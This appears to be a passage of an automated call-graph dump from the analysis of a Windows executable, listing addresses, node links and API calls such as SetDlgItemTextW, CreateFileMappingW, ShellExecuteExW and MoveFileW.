7ff7e1ddb72b 25607->25618 25619 7ff7e1ddb68b GetTickCount 25607->25619 25608->25607 25615 7ff7e1ddbe4e 25609->25615 25616 7ff7e1ddc386 25610->25616 26168 7ff7e1db2034 25611->26168 26172 7ff7e1de2320 25613->26172 25614->25618 25637 7ff7e1ddbb79 25614->25637 25629 7ff7e1db1fa0 31 API calls 25615->25629 25620 7ff7e1db255c 61 API calls 25616->25620 25624 7ff7e1ddba50 25618->25624 26139 7ff7e1dc6454 25618->26139 25887 7ff7e1db4228 25619->25887 25623 7ff7e1ddc3e4 25620->25623 25630 7ff7e1ddc3e8 25623->25630 25640 7ff7e1ddc489 GetDlgItem SetFocus 25623->25640 25667 7ff7e1ddc3fd 25623->25667 25624->25628 26163 7ff7e1dbbd0c 33 API calls 25624->26163 25625 7ff7e1ddbdbe 25626 7ff7e1db1fa0 31 API calls 25625->25626 25635 7ff7e1ddbdcc 25626->25635 25628->25502 25638 7ff7e1ddbe78 25629->25638 25648 7ff7e1de2320 _handle_error 8 API calls 25630->25648 25634 7ff7e1ddb74e 26151 7ff7e1dcb914 102 API calls 25634->26151 25643 7ff7e1db1fa0 31 API calls 25635->25643 25652 7ff7e1dcaae0 48 API calls 25637->25652 25646 7ff7e1db1fa0 31 API calls 25638->25646 25639 7ff7e1ddba75 26164 7ff7e1db1150 25639->26164 25644 7ff7e1ddc4ba 25640->25644 25643->25550 25657 7ff7e1db129c 33 API calls 25644->25657 25645 7ff7e1ddb6ba 25897 7ff7e1db1fa0 25645->25897 25653 7ff7e1ddbe83 25646->25653 25655 7ff7e1ddca97 25648->25655 25650 7ff7e1ddb768 25656 7ff7e1dcda98 48 API calls 25650->25656 25659 7ff7e1ddbba7 SetDlgItemTextW 25652->25659 25660 7ff7e1db1fa0 31 API calls 25653->25660 25654 7ff7e1ddba8a 25661 7ff7e1dcaae0 48 API calls 25654->25661 25663 7ff7e1ddb7aa GetCommandLineW 25656->25663 25664 7ff7e1ddc4cc 25657->25664 25658 7ff7e1ddb6c8 25902 7ff7e1dc2134 25658->25902 25665 7ff7e1db2534 25659->25665 25660->25502 25666 7ff7e1ddba97 25661->25666 25662 7ff7e1ddc434 SendDlgItemMessageW 25668 7ff7e1ddc454 25662->25668 25669 7ff7e1ddc45d EndDialog 25662->25669 25670 7ff7e1ddb84f 25663->25670 25671 7ff7e1ddb869 25663->25671 26186 7ff7e1dc80d8 33 API calls 25664->26186 25673 7ff7e1ddbbc5 SetDlgItemTextW GetDlgItem 25665->25673 25674 7ff7e1db1150 33 API calls 25666->25674 25667->25630 25667->25662 25668->25669 25669->25630 26152 7ff7e1db20b0 25670->26152 26156 7ff7e1ddab54 33 API calls _handle_error 25671->26156 25678 7ff7e1ddbc13 25673->25678 25679 7ff7e1ddbbf0 GetWindowLongPtrW SetWindowLongPtrW 25673->25679 25680 7ff7e1ddbaaa 25674->25680 25675 7ff7e1ddc4e0 25681 7ff7e1db250c SetDlgItemTextW 25675->25681 25922 7ff7e1ddce88 25678->25922 25679->25678 25685 7ff7e1db1fa0 31 API calls 25680->25685 25687 7ff7e1ddc4f4 25681->25687 25682 7ff7e1ddb87a 26157 7ff7e1ddab54 33 API calls _handle_error 25682->26157 25692 7ff7e1ddbab5 25685->25692 25697 7ff7e1ddc526 SendDlgItemMessageW FindFirstFileW 25687->25697 25689 7ff7e1ddb704 25918 7ff7e1dc204c 25689->25918 25690 7ff7e1ddb6f5 GetLastError 25690->25689 25696 7ff7e1db1fa0 31 API calls 25692->25696 25693 7ff7e1ddb88b 26158 7ff7e1ddab54 33 API calls _handle_error 25693->26158 25695 7ff7e1ddce88 160 API calls 25700 7ff7e1ddbc3c 25695->25700 25701 7ff7e1ddbac3 25696->25701 25702 7ff7e1ddc57b 25697->25702 25707 7ff7e1ddca04 25697->25707 26072 7ff7e1ddf974 25700->26072 25712 7ff7e1dcaae0 48 API calls 25701->25712 25713 7ff7e1dcaae0 48 API calls 25702->25713 25703 7ff7e1ddb89c 26159 7ff7e1dcb9b4 102 API calls 25703->26159 25707->25630 25710 7ff7e1ddca81 25707->25710 25715 7ff7e1ddcaa9 25707->25715 25758 7ff7e1ddcac6 25707->25758 25709 7ff7e1ddb8b3 26160 7ff7e1ddfbdc 33 API calls 25709->26160 25710->25630 25711 7ff7e1ddce88 160 API calls 25725 7ff7e1ddbc6a 25711->25725 25716 7ff7e1ddbadb 25712->25716 25718 7ff7e1ddc59e 25713->25718 25720 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25715->25720 25726 7ff7e1db129c 33 API calls 25716->25726 25717 7ff7e1ddbc96 26086 7ff7e1db2298 GetDlgItem EnableWindow 25717->26086 25729 7ff7e1db129c 33 API calls 25718->25729 25719 7ff7e1ddb8d2 CreateFileMappingW 25722 7ff7e1ddb953 ShellExecuteExW 25719->25722 25723 7ff7e1ddb911 MapViewOfFile 25719->25723 25724 7ff7e1ddcaae 25720->25724 25745 7ff7e1ddb974 25722->25745 26161 7ff7e1de3640 25723->26161 25730 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25724->25730 25725->25717 25728 7ff7e1ddce88 160 API calls 25725->25728 25736 7ff7e1ddbb04 25726->25736 25728->25717 25732 7ff7e1ddc5cd 25729->25732 25731 7ff7e1ddcab4 25730->25731 25734 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25731->25734 25733 7ff7e1db1150 33 API calls 25732->25733 25737 7ff7e1ddc5e8 25733->25737 25739 7ff7e1ddcaba 25734->25739 25735 7ff7e1ddbb5a 25740 7ff7e1db1fa0 31 API calls 25735->25740 25736->25582 25736->25735 26187 7ff7e1dbe164 33 API calls 2 library calls 25737->26187 25738 7ff7e1ddb9c3 25742 7ff7e1ddb9ef 25738->25742 25743 7ff7e1ddb9dc UnmapViewOfFile CloseHandle 25738->25743 25747 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25739->25747 25740->25628 25742->25558 25746 7ff7e1ddba25 25742->25746 25743->25742 25744 7ff7e1ddc5ff 25748 7ff7e1db1fa0 31 API calls 25744->25748 25745->25738 25752 7ff7e1ddb9b1 Sleep 25745->25752 25750 7ff7e1db1fa0 31 API calls 25746->25750 25749 7ff7e1ddcac0 25747->25749 25751 7ff7e1ddc60c 25748->25751 25755 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25749->25755 25753 7ff7e1ddba42 25750->25753 25751->25724 25754 7ff7e1db1fa0 31 API calls 25751->25754 25752->25738 25752->25745 25756 7ff7e1db1fa0 31 API calls 25753->25756 25757 7ff7e1ddc673 25754->25757 25755->25758 25756->25624 25759 7ff7e1db250c SetDlgItemTextW 25757->25759 25761 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25758->25761 25760 7ff7e1ddc687 FindClose 25759->25760 25762 7ff7e1ddc6a3 25760->25762 25763 7ff7e1ddc797 SendDlgItemMessageW 25760->25763 25764 7ff7e1ddcacc 25761->25764 26188 7ff7e1dda2cc 10 API calls _handle_error 25762->26188 25766 7ff7e1ddc7cb 25763->25766 25769 7ff7e1dcaae0 48 API calls 25766->25769 25767 7ff7e1ddc6c6 25768 7ff7e1dcaae0 48 API calls 25767->25768 25770 7ff7e1ddc6cf 25768->25770 25771 7ff7e1ddc7d8 25769->25771 25772 7ff7e1dcda98 48 API calls 25770->25772 25773 7ff7e1db129c 33 API calls 25771->25773 25777 7ff7e1ddc6ec BuildCatchObjectHelperInternal 25772->25777 25774 7ff7e1ddc807 25773->25774 25776 7ff7e1db1150 33 API calls 25774->25776 25775 7ff7e1db1fa0 31 API calls 25778 7ff7e1ddc783 25775->25778 25779 7ff7e1ddc822 25776->25779 25777->25731 25777->25775 25780 7ff7e1db250c SetDlgItemTextW 25778->25780 26189 7ff7e1dbe164 33 API calls 2 library calls 25779->26189 25780->25763 25782 7ff7e1ddc839 25783 7ff7e1db1fa0 31 API calls 25782->25783 25784 7ff7e1ddc845 BuildCatchObjectHelperInternal 25783->25784 25785 7ff7e1db1fa0 31 API calls 25784->25785 25786 7ff7e1ddc87f 25785->25786 25787 7ff7e1db1fa0 31 API calls 25786->25787 25788 7ff7e1ddc88c 25787->25788 25788->25739 25789 7ff7e1db1fa0 31 API calls 25788->25789 25790 7ff7e1ddc8f3 25789->25790 25791 7ff7e1db250c SetDlgItemTextW 25790->25791 25792 7ff7e1ddc907 25791->25792 25792->25707 26190 7ff7e1dda2cc 10 API calls _handle_error 25792->26190 25794 7ff7e1ddc932 25795 7ff7e1dcaae0 48 API calls 25794->25795 25796 7ff7e1ddc93c 25795->25796 25797 7ff7e1dcda98 48 API calls 25796->25797 25799 7ff7e1ddc959 BuildCatchObjectHelperInternal 25797->25799 25798 7ff7e1db1fa0 31 API calls 25800 7ff7e1ddc9f0 25798->25800 25799->25749 25799->25798 25801 7ff7e1db250c SetDlgItemTextW 25800->25801 25801->25707 25803 7ff7e1db256a 25802->25803 25804 7ff7e1db25d0 25802->25804 25803->25804 26191 7ff7e1dca4ac 25803->26191 25804->25461 25806 7ff7e1db258f 25806->25804 25807 7ff7e1db25a4 GetDlgItem 25806->25807 25807->25804 25808 7ff7e1db25b7 25807->25808 25808->25804 25809 7ff7e1db25be SetDlgItemTextW 25808->25809 25809->25804 25811 7ff7e1db2334 25810->25811 25812 7ff7e1db22fc 25810->25812 26290 7ff7e1db23f8 GetWindowTextLengthW 25811->26290 25814 7ff7e1db129c 33 API calls 25812->25814 25815 7ff7e1db232a BuildCatchObjectHelperInternal 25814->25815 25816 7ff7e1db1fa0 31 API calls 25815->25816 25818 7ff7e1db2389 25815->25818 25816->25818 25817 7ff7e1de2320 _handle_error 8 API calls 25820 7ff7e1db23dd 25817->25820 25819 7ff7e1db23c8 25818->25819 25821 7ff7e1db23f0 25818->25821 25819->25817 25820->25488 25820->25489 25820->25628 25822 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25821->25822 25823 7ff7e1db23f5 25822->25823 25825 7ff7e1db8d34 25824->25825 25826 7ff7e1db8de8 25824->25826 25829 7ff7e1db8d91 25825->25829 25830 7ff7e1db8de3 25825->25830 25832 7ff7e1db8d42 BuildCatchObjectHelperInternal 25825->25832 26335 7ff7e1db2004 33 API calls std::_Xinvalid_argument 25826->26335 25829->25832 25833 7ff7e1de21d0 33 API calls 25829->25833 26334 7ff7e1db1f80 33 API calls 3 library calls 25830->26334 25832->25511 25833->25832 25838 7ff7e1ddefb0 25834->25838 25835 7ff7e1ddefd7 25836 7ff7e1de2320 _handle_error 8 API calls 25835->25836 25837 7ff7e1ddb537 25836->25837 25848 7ff7e1dcaae0 25837->25848 25838->25835 26336 7ff7e1dbbd0c 33 API calls 25838->26336 25840 7ff7e1ddf02a 25841 7ff7e1db1150 33 API calls 25840->25841 25842 7ff7e1ddf03f 25841->25842 25844 7ff7e1db1fa0 31 API calls 25842->25844 25846 7ff7e1ddf04f BuildCatchObjectHelperInternal 25842->25846 25843 7ff7e1db1fa0 31 API calls 25845 7ff7e1ddf076 25843->25845 25844->25846 25847 7ff7e1db1fa0 31 API calls 25845->25847 25846->25843 25847->25835 25849 7ff7e1dcaaf3 25848->25849 26337 7ff7e1dc9774 25849->26337 25852 7ff7e1dcab86 25855 7ff7e1dcda98 25852->25855 25853 7ff7e1dcab58 LoadStringW 25853->25852 25854 7ff7e1dcab71 LoadStringW 25853->25854 25854->25852 26356 7ff7e1dcd874 25855->26356 25858 7ff7e1ddf0a4 26390 7ff7e1ddae1c PeekMessageW 25858->26390 25861 7ff7e1ddf143 IsDlgButtonChecked IsDlgButtonChecked 25863 7ff7e1ddf1a4 IsDlgButtonChecked 25861->25863 25864 7ff7e1ddf189 25861->25864 25862 7ff7e1ddf0f5 25867 7ff7e1ddf101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 25862->25867 25865 7ff7e1ddf1c3 25863->25865 25866 7ff7e1ddf1c6 IsDlgButtonChecked IsDlgButtonChecked 25863->25866 25864->25863 25865->25866 25868 7ff7e1ddf1f3 IsDlgButtonChecked 25866->25868 25869 7ff7e1ddf218 IsDlgButtonChecked 25866->25869 25867->25861 25868->25869 25870 7ff7e1de2320 _handle_error 8 API calls 25869->25870 25871 7ff7e1ddb578 25870->25871 25871->25562 25875 7ff7e1dc309d 25872->25875 25880 7ff7e1dc2f8e 25872->25880 25873 7ff7e1de2320 _handle_error 8 API calls 25874 7ff7e1dc30b3 25873->25874 25874->25586 25874->25587 25875->25873 25876 7ff7e1dc3077 25876->25875 25877 7ff7e1dc3684 56 API calls 25876->25877 25877->25875 25878 7ff7e1db129c 33 API calls 25878->25880 25880->25876 25880->25878 25881 7ff7e1dc30c8 25880->25881 26395 7ff7e1dc3684 25880->26395 25882 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25881->25882 25883 7ff7e1dc30cd 25882->25883 25885 7ff7e1dc7fd2 SetCurrentDirectoryW 25884->25885 25886 7ff7e1dc7fcf 25884->25886 25885->25603 25886->25885 25888 7ff7e1db4255 25887->25888 25889 7ff7e1db426a 25888->25889 25890 7ff7e1db129c 33 API calls 25888->25890 25891 7ff7e1de2320 _handle_error 8 API calls 25889->25891 25890->25889 25892 7ff7e1db42a1 25891->25892 25893 7ff7e1db3c84 25892->25893 25894 7ff7e1db3cab 25893->25894 26528 7ff7e1db710c 25894->26528 25896 7ff7e1db3cbb BuildCatchObjectHelperInternal 25896->25645 25898 7ff7e1db1fdc 25897->25898 25899 7ff7e1db1fb3 25897->25899 25898->25658 25899->25898 25900 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25899->25900 25901 7ff7e1db2000 25900->25901 25905 7ff7e1dc216a 25902->25905 25903 7ff7e1dc219e 25907 7ff7e1dc6a0c 49 API calls 25903->25907 25914 7ff7e1dc227f 25903->25914 25904 7ff7e1dc21b1 CreateFileW 25904->25903 25905->25903 25905->25904 25906 7ff7e1dc22af 25908 7ff7e1de2320 _handle_error 8 API calls 25906->25908 25909 7ff7e1dc2209 25907->25909 25911 7ff7e1dc22c4 25908->25911 25912 7ff7e1dc2246 25909->25912 25913 7ff7e1dc220d CreateFileW 25909->25913 25910 7ff7e1db20b0 33 API calls 25910->25906 25911->25689 25911->25690 25912->25914 25915 7ff7e1dc22d8 25912->25915 25913->25912 25914->25906 25914->25910 25916 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25915->25916 25917 7ff7e1dc22dd 25916->25917 25919 7ff7e1dc2066 25918->25919 25921 7ff7e1dc2072 25918->25921 25919->25921 26540 7ff7e1dc20d0 25919->26540 26547 7ff7e1ddaa08 25922->26547 25924 7ff7e1ddd1ee 25925 7ff7e1db1fa0 31 API calls 25924->25925 25926 7ff7e1ddd1f7 25925->25926 25927 7ff7e1de2320 _handle_error 8 API calls 25926->25927 25929 7ff7e1ddbc2b 25927->25929 25928 7ff7e1dcd22c 33 API calls 26067 7ff7e1ddcf03 BuildCatchObjectHelperInternal 25928->26067 25929->25695 25930 7ff7e1ddeefa 26680 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 25930->26680 25933 7ff7e1ddef00 26681 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 25933->26681 25934 7ff7e1db129c 33 API calls 25934->26067 25936 7ff7e1ddeeee 25939 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25936->25939 25937 7ff7e1ddef06 25941 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25937->25941 25940 7ff7e1ddeef4 25939->25940 26679 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 25940->26679 25942 7ff7e1ddef0c 25941->25942 25945 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25942->25945 25946 7ff7e1ddef12 25945->25946 25951 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25946->25951 25947 7ff7e1ddee4a 25948 7ff7e1ddeed2 25947->25948 25952 7ff7e1db20b0 33 API calls 25947->25952 26677 7ff7e1db1f80 33 API calls 3 library calls 25948->26677 25949 7ff7e1db13a4 33 API calls 25953 7ff7e1dddc3a GetTempPathW 25949->25953 25950 7ff7e1ddeee8 26678 7ff7e1db2004 33 API calls std::_Xinvalid_argument 25950->26678 25954 7ff7e1ddef18 25951->25954 25957 7ff7e1ddee77 25952->25957 25953->26067 25962 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25954->25962 25955 7ff7e1dc62dc 35 API calls 25955->26067 26676 7ff7e1ddabe8 33 API calls 3 library calls 25957->26676 25960 7ff7e1ddee8d 25968 7ff7e1db1fa0 31 API calls 25960->25968 25972 7ff7e1ddeea4 BuildCatchObjectHelperInternal 25960->25972 25961 7ff7e1db2520 SetDlgItemTextW 25961->26067 25966 7ff7e1ddef1e 25962->25966 25964 7ff7e1debb8c 43 API calls 25964->26067 25973 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25966->25973 25968->25972 25969 7ff7e1db1fa0 31 API calls 25969->25948 25970 7ff7e1dde7f3 25970->25948 25970->25950 25971 7ff7e1de21d0 33 API calls 25970->25971 25981 7ff7e1dde83b BuildCatchObjectHelperInternal 25970->25981 25971->25981 25972->25969 25974 7ff7e1ddef24 25973->25974 25979 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25974->25979 25976 7ff7e1ddaa08 33 API calls 25976->26067 25977 7ff7e1ddef6c 26684 7ff7e1db2004 33 API calls std::_Xinvalid_argument 25977->26684 25978 7ff7e1ddef78 26686 7ff7e1db2004 33 API calls std::_Xinvalid_argument 25978->26686 25984 7ff7e1ddef2a 25979->25984 25980 7ff7e1dc3f30 54 API calls 25980->26067 25989 7ff7e1db20b0 33 API calls 25981->25989 26030 7ff7e1ddeb8f 25981->26030 25983 7ff7e1db1fa0 31 API calls 25983->25947 25995 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25984->25995 25985 7ff7e1ddef72 26685 7ff7e1db1f80 33 API calls 3 library calls 25985->26685 25987 7ff7e1dc5820 33 API calls 25987->26067 25988 7ff7e1ddef66 26683 7ff7e1db1f80 33 API calls 3 library calls 25988->26683 25996 7ff7e1dde963 25989->25996 25992 7ff7e1dded40 25992->25978 25992->25985 26008 7ff7e1dded3b BuildCatchObjectHelperInternal 25992->26008 26013 7ff7e1de21d0 33 API calls 25992->26013 25994 7ff7e1ddec2a 25994->25977 25994->25988 26002 7ff7e1ddec72 BuildCatchObjectHelperInternal 25994->26002 25994->26008 26010 7ff7e1de21d0 33 API calls 25994->26010 26000 7ff7e1ddef30 25995->26000 26003 7ff7e1ddef60 25996->26003 26009 7ff7e1db129c 33 API calls 25996->26009 25999 7ff7e1dbe164 33 API calls 25999->26067 26014 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26000->26014 26001 7ff7e1dc3d34 51 API calls 26001->26067 26590 7ff7e1ddf4e0 26002->26590 26682 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 26003->26682 26005 7ff7e1ddd5e9 GetDlgItem 26011 7ff7e1db2520 SetDlgItemTextW 26005->26011 26008->25983 26015 7ff7e1dde9a6 26009->26015 26010->26002 26016 7ff7e1ddd608 IsDlgButtonChecked 26011->26016 26013->26008 26020 7ff7e1ddef36 26014->26020 26672 7ff7e1dcd22c 26015->26672 26016->26067 26017 7ff7e1dcdc2c 33 API calls 26017->26067 26018 7ff7e1dc32bc 51 API calls 26018->26067 26019 7ff7e1db2674 31 API calls 26019->26067 26024 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26020->26024 26023 7ff7e1dc5b60 53 API calls 26023->26067 26029 7ff7e1ddef3c 26024->26029 26025 7ff7e1dc5aa8 33 API calls 26025->26067 26026 7ff7e1ddd63c IsDlgButtonChecked 26026->26067 26032 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26029->26032 26030->25992 26030->25994 26035 7ff7e1ddef54 26030->26035 26036 7ff7e1ddef5a 26030->26036 26038 7ff7e1ddef42 26032->26038 26034 7ff7e1db129c 33 API calls 26059 7ff7e1dde9d1 26034->26059 26037 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26035->26037 26040 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26036->26040 26037->26036 26043 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26038->26043 26040->26003 26041 7ff7e1db4228 33 API calls 26041->26067 26042 7ff7e1db2034 33 API calls 26042->26067 26045 7ff7e1ddef48 26043->26045 26044 7ff7e1dc32a8 51 API calls 26044->26067 26046 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26045->26046 26048 7ff7e1ddef4e 26046->26048 26047 7ff7e1db250c SetDlgItemTextW 26047->26067 26052 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26048->26052 26051 7ff7e1db1150 33 API calls 26051->26067 26052->26035 26054 7ff7e1dd99c8 31 API calls 26054->26067 26055 7ff7e1db1fa0 31 API calls 26055->26059 26057 7ff7e1dd13c4 CompareStringW 26057->26059 26059->26030 26059->26034 26059->26045 26059->26048 26059->26055 26059->26057 26061 7ff7e1dcd22c 33 API calls 26059->26061 26060 7ff7e1dddf99 EndDialog 26060->26067 26061->26059 26062 7ff7e1dddb21 MoveFileW 26064 7ff7e1dddb55 MoveFileExW 26062->26064 26065 7ff7e1dddb70 26062->26065 26063 7ff7e1db1fa0 31 API calls 26063->26067 26064->26065 26066 7ff7e1db1fa0 31 API calls 26065->26066 26065->26067 26066->26065 26067->25924 26067->25928 26067->25930 26067->25933 26067->25934 26067->25936 26067->25937 26067->25940 26067->25942 26067->25946 26067->25947 26067->25949 26067->25954 26067->25955 26067->25961 26067->25964 26067->25966 26067->25970 26067->25974 26067->25976 26067->25980 26067->25984 26067->25987 26067->25999 26067->26000 26067->26001 26067->26017 26067->26018 26067->26019 26067->26020 26067->26023 26067->26025 26067->26026 26067->26029 26067->26038 26067->26041 26067->26042 26067->26044 26067->26047 26067->26051 26067->26054 26067->26060 26067->26062 26067->26063 26068 7ff7e1dc2f58 56 API calls 26067->26068 26069 7ff7e1db20b0 33 API calls 26067->26069 26071 7ff7e1db8d04 33 API calls 26067->26071 26551 7ff7e1dd13c4 CompareStringW 26067->26551 26552 7ff7e1dda440 26067->26552 26628 7ff7e1dccfa4 35 API calls _invalid_parameter_noinfo_noreturn 26067->26628 26629 7ff7e1dd95b4 33 API calls Concurrency::cancel_current_task 26067->26629 26630 7ff7e1de0684 31 API calls _invalid_parameter_noinfo_noreturn 26067->26630 26631 7ff7e1dbdf4c 47 API calls BuildCatchObjectHelperInternal 26067->26631 26632 7ff7e1dda834 33 API calls _invalid_parameter_noinfo_noreturn 26067->26632 26633 7ff7e1dd9518 33 API calls 26067->26633 26634 7ff7e1ddabe8 33 API calls 3 library calls 26067->26634 26635 7ff7e1dc7368 33 API calls 2 library calls 26067->26635 26636 7ff7e1dc4088 33 API calls 26067->26636 26637 7ff7e1dc65b0 33 API calls 3 library calls 26067->26637 26638 7ff7e1dc72cc 26067->26638 26642 7ff7e1db1744 33 API calls 4 library calls 26067->26642 26643 7ff7e1dc31bc 26067->26643 26657 7ff7e1dc3ea0 FindClose 26067->26657 26658 7ff7e1dd13f4 CompareStringW 26067->26658 26659 7ff7e1dd9cd0 47 API calls 26067->26659 26660 7ff7e1dd87d8 51 API calls 3 library calls 26067->26660 26661 7ff7e1ddab54 33 API calls _handle_error 26067->26661 26662 7ff7e1dc7df4 26067->26662 26670 7ff7e1dc5b08 CompareStringW 26067->26670 26671 7ff7e1dc7eb0 47 API calls 26067->26671 26068->26067 26069->26067 26071->26067 26073 7ff7e1ddf9a3 26072->26073 26074 7ff7e1db20b0 33 API calls 26073->26074 26076 7ff7e1ddf9b9 26074->26076 26075 7ff7e1ddf9ee 26700 7ff7e1dbe34c 26075->26700 26076->26075 26077 7ff7e1db20b0 33 API calls 26076->26077 26077->26075 26079 7ff7e1ddfa4b 26720 7ff7e1dbe7a8 26079->26720 26083 7ff7e1ddfa61 26084 7ff7e1de2320 _handle_error 8 API calls 26083->26084 26085 7ff7e1ddbc52 26084->26085 26085->25711 27800 7ff7e1dd849c 26087->27800 26090 7ff7e1ddf4b7 26092 7ff7e1de2320 _handle_error 8 API calls 26090->26092 26091 7ff7e1ddf3c7 GetWindow 26096 7ff7e1ddf3e2 26091->26096 26093 7ff7e1ddbe9b 26092->26093 26093->25468 26093->25469 26094 7ff7e1ddf3ee GetClassNameW 27805 7ff7e1dd13c4 CompareStringW 26094->27805 26096->26090 26096->26094 26097 7ff7e1ddf496 GetWindow 26096->26097 26098 7ff7e1ddf417 GetWindowLongPtrW 26096->26098 26097->26090 26097->26096 26098->26097 26099 7ff7e1ddf429 IsDlgButtonChecked 26098->26099 26099->26097 26100 7ff7e1ddf445 GetObjectW 26099->26100 27806 7ff7e1dd8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26100->27806 26102 7ff7e1ddf461 27807 7ff7e1dd84cc 26102->27807 27811 7ff7e1dd8df4 16 API calls _handle_error 26102->27811 26105 7ff7e1ddf479 IsDlgButtonChecked DeleteObject 26105->26097 26107 7ff7e1dc6300 26106->26107 26108 7ff7e1dc638d 26106->26108 26109 7ff7e1db13a4 33 API calls 26107->26109 26108->25485 26110 7ff7e1dc631b GetCurrentDirectoryW 26109->26110 26111 7ff7e1dc6341 26110->26111 26112 7ff7e1db20b0 33 API calls 26111->26112 26113 7ff7e1dc634f 26112->26113 26113->26108 26114 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26113->26114 26115 7ff7e1dc63a9 26114->26115 26117 7ff7e1db252a SetDlgItemTextW 26116->26117 26118 7ff7e1db2527 26116->26118 26119 7ff7e1e1e2db 26117->26119 26118->26117 26120->25493 26122 7ff7e1db2516 SetDlgItemTextW 26121->26122 26123 7ff7e1db2513 26121->26123 26123->26122 26125 7ff7e1db12d0 26124->26125 26126 7ff7e1db139b 26124->26126 26129 7ff7e1db1396 26125->26129 26130 7ff7e1db1338 26125->26130 26133 7ff7e1db12de BuildCatchObjectHelperInternal 26125->26133 27815 7ff7e1db2004 33 API calls std::_Xinvalid_argument 26126->27815 27814 7ff7e1db1f80 33 API calls 3 library calls 26129->27814 26132 7ff7e1de21d0 33 API calls 26130->26132 26130->26133 26132->26133 26133->25531 26134->25565 26136 7ff7e1dc32bc 51 API calls 26135->26136 26137 7ff7e1dc32b1 26136->26137 26137->25575 26137->25597 26138->25575 26140 7ff7e1db13a4 33 API calls 26139->26140 26141 7ff7e1dc6489 26140->26141 26142 7ff7e1dc648c GetModuleFileNameW 26141->26142 26145 7ff7e1dc64dc 26141->26145 26143 7ff7e1dc64a7 26142->26143 26144 7ff7e1dc64de 26142->26144 26143->26141 26144->26145 26146 7ff7e1db129c 33 API calls 26145->26146 26148 7ff7e1dc6506 26146->26148 26147 7ff7e1dc653e 26147->25634 26148->26147 26149 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26148->26149 26150 7ff7e1dc6560 26149->26150 26151->25650 26153 7ff7e1db20f6 26152->26153 26154 7ff7e1db20cb BuildCatchObjectHelperInternal 26152->26154 27816 7ff7e1db1474 33 API calls 3 library calls 26153->27816 26154->25671 26156->25682 26157->25693 26158->25703 26159->25709 26160->25719 26162 7ff7e1de3620 26161->26162 26162->25722 26163->25639 26165 7ff7e1db1177 26164->26165 26166 7ff7e1db2034 33 API calls 26165->26166 26167 7ff7e1db1185 BuildCatchObjectHelperInternal 26166->26167 26167->25654 26169 7ff7e1db2085 26168->26169 26171 7ff7e1db2059 BuildCatchObjectHelperInternal 26168->26171 27817 7ff7e1db15b8 33 API calls 3 library calls 26169->27817 26171->25625 26173 7ff7e1de2329 26172->26173 26174 7ff7e1ddc350 26173->26174 26175 7ff7e1de2550 IsProcessorFeaturePresent 26173->26175 26176 7ff7e1de2568 26175->26176 27818 7ff7e1de2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26176->27818 26178 7ff7e1de257b 27819 7ff7e1de2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26178->27819 27820 7ff7e1de783c 31 API calls 2 library calls 26181->27820 26183 7ff7e1de791d 27821 7ff7e1de7934 16 API calls abort 26183->27821 26186->25675 26187->25744 26188->25767 26189->25782 26190->25794 26216 7ff7e1dc3e28 26191->26216 26195 7ff7e1dca589 26222 7ff7e1dc9408 26195->26222 26198 7ff7e1dca603 26200 7ff7e1dca6c2 26198->26200 26201 7ff7e1dca60c GetWindowLongPtrW 26198->26201 26199 7ff7e1dca6f2 GetSystemMetrics GetWindow 26202 7ff7e1dca821 26199->26202 26214 7ff7e1dca71d 26199->26214 26241 7ff7e1dc95a8 26200->26241 26204 7ff7e1e1e2c0 26201->26204 26203 7ff7e1de2320 _handle_error 8 API calls 26202->26203 26206 7ff7e1dca830 26203->26206 26207 7ff7e1dca6aa GetWindowRect 26204->26207 26206->25806 26207->26200 26210 7ff7e1dca6e5 SetDlgItemTextW 26210->26199 26211 7ff7e1dca519 26211->26195 26213 7ff7e1dca56a SetDlgItemTextW 26211->26213 26237 7ff7e1dc9800 26211->26237 26212 7ff7e1dca73e GetWindowRect 26212->26214 26213->26211 26214->26202 26214->26212 26215 7ff7e1dca800 GetWindow 26214->26215 26215->26202 26215->26214 26217 7ff7e1dc3e4d _snwprintf 26216->26217 26250 7ff7e1de9ef0 26217->26250 26220 7ff7e1dd0f68 WideCharToMultiByte 26221 7ff7e1dd0faa 26220->26221 26221->26211 26223 7ff7e1dc95a8 47 API calls 26222->26223 26226 7ff7e1dc944f 26223->26226 26224 7ff7e1de2320 _handle_error 8 API calls 26225 7ff7e1dc958e 